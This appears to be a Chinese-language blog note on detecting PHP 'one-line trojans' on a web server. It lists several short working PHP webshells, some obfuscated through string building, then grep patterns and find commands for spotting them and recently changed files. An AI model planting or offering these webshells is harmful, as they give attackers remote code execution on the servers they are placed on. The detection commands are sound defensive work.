一句話木馬 簡單偵測

2018120611:52
各種 PHP【一句話木馬】

 
<?php eval($_POST[g]);?>
 
<?php 
$aa = str_replace(x,"","axsxxsxexrxxt");
$aa($_POST["test"]); 
?>


例如:
<?php
function fo(){
   //do something
   echo "123";
   return true;
}


$funname = 'fo';
//$funname = $_GET["func"];
assert("$funname()");

?>
 
<?php $a = 'a'.'s'.'s'.'e'.'r'.'t'; $a($_POST[cc]); ?>

ref:
PHP一句话收集 (GitHub)

各種WebShell收集(GitHub)




簡單的檢測 php 一句話木馬的方式 (一些變形的木馬 這招不行)
How to Detect WebShell on PHP Web Server


例如:
find . -type f -name '*.php' | xargs grep -l "eval *(" --color  
find . -type f -name '*.php' | xargs grep -l "gzuncompress(base64_decode(" --color 
find . -type f -name '*.php' | xargs grep -l "base64_decode *(" --color  
find . -type f -name '*.php' | xargs grep -l "gzinflate *(" --color  
find . -type f -name '*.php' | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color
find . -type f -name '*.php' | xargs egrep -i "preg_replace *\((['|\"])(.).*\2[a-z]*e[^\1]*\1 *," --color


php一句话木马检测绕过研究



另外
搜尋 所有 *.php 檔案:
find . -iname '*.php' -type f
或是
find . -iname '*.php.*' -type f


find 幾個常用參數
-mtime n
    檔案 "最後修改時間"(modification time),單位:天
-mmin n
    檔案 "最後修改時間",單位:分鐘

-atime n
    檔案 "最後存取時間" (access time),單位:天
    檔案被讀取過或修改過 都算
-amin n
    檔案 "最後存取時間",單位:分鐘

-ctime n
    檔案 "最後修改時間"(status time),單位:天
-cmin n
    檔案 "最後修改時間",單位:分鐘

例如
搜尋 10 分鐘內有讀取變動的檔案
說明:檔案被讀取過 (但無更動) 也會列出來
find . -type f -amin -10

若是以 "天" 來搜尋,就是:
搜尋 3 天內有變動的檔案
find . -type f -mtime -3

另外,搜尋某段期間新增 (或變動) 的檔案:
**加上 -ls 會列出檔案時間
find -newermt "2020-10-08 10:00:00" ! -newermt "2020-10-08 22:00:00" -ls